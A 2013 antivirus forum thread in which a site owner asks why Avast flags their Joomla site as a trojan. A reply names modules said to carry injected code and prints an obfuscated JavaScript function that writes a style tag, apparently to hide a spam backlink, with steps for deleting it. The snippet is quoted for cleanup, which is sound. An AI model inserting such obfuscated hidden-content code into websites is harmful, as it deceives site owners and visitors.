Author Topic: Avast detect cheval de troie... and no cheval de troie on the web site  (Read 5824 times)

0 Members and 1 Guest are viewing this topic.

welcomeulm

  • Guest
on my site www.clancreation.com, AVAST detected a "trojan" but in fact there is not ... why? how to solve this problem?

Splaaaty

  • Guest
Re: Avast detect cheval de troie... and no cheval de troie on the web site
« Reply #1 on: August 02, 2013, 09:39:06 PM »
Hi, I clicked the link to your site and Avast had blocked it completely. After disabling Avast's shields, however, I got through. Very possibly a bug, the team should look into fixing that.

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37506
  • Not a avast user
Re: Avast detect cheval de troie... and no cheval de troie on the web site
« Reply #2 on: August 02, 2013, 09:42:13 PM »
Check your site at www.sucuri.net   and be surprised.  ;)

welcomeulm

  • Guest
Re: Avast detect cheval de troie... and no cheval de troie on the web site
« Reply #3 on: August 02, 2013, 10:28:00 PM »
What i must do? Please help!

Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2219
    • The WAR Against Malware
Re: Avast detect cheval de troie... and no cheval de troie on the web site
« Reply #4 on: August 03, 2013, 08:20:06 PM »
Hi,

Just as a heads-up, your site appears to be clean now. :)

Reference: http://forum.avast.com/index.php?topic=131491.0

~!Donovan
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

ncgois

  • Guest
Re: Avast detect cheval de troie... and no cheval de troie on the web site
« Reply #5 on: August 06, 2013, 01:35:02 AM »
I think that your problem is on a module. The most popular modules that use this code are:

- Autson Skitter Slideshow (mod_AutsonSlideShow)
The malicious code is located in the "tmpl" folder, in the php file(s).

- Share This for Joomla! (mod_JoomlaShare This)
The malicious code is located in mod_JoomlaShare This.php.

- VirtueMart Advanced Search (mod_virtuemart_advsearch)
The malicious code is located in mod_virtuemart_advsearch.php.

- AddThis For Joomla (mod_AddThisForJoomla)
The malicious code is located in mod_AddThisForJoomla.php.

- Plimun Nivo Slider (mod_PlimunNivoSlider)
The malicious code is located in the "tmpl" folder, in the php file(s).

Using Autson as an example, go to your file explorer and enter this path: /modules/mod_AutsonSlideShow/tmpl/default.php

 Edit the .php file (the name of this file is shown above, near the name module in this post )and look for this javascript tag and you should see this amount of code:

<script language="JavaScript">

function dnnViewState()

{

var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];

t=z='';

for(v=0;v<m.length;){t+=m.charAt(v++);

if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);

t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();

</script>


Delete this code. If you don't feel confident to do it you can create a copy of the original file in case in goes wrong.

Normally, at last line, is the link to the developer website and antivirus detect it like unwanted Pub. Know, go to the last line of the file and delete this tag:
<p class="dnn">By A <a href="http://www.autson.com/" title="web design company">Web Design</a></p>

in autsonImageSlider module example. Proceed the same way to the other modules.

Save it, and enjoy.
Hope it was usefull.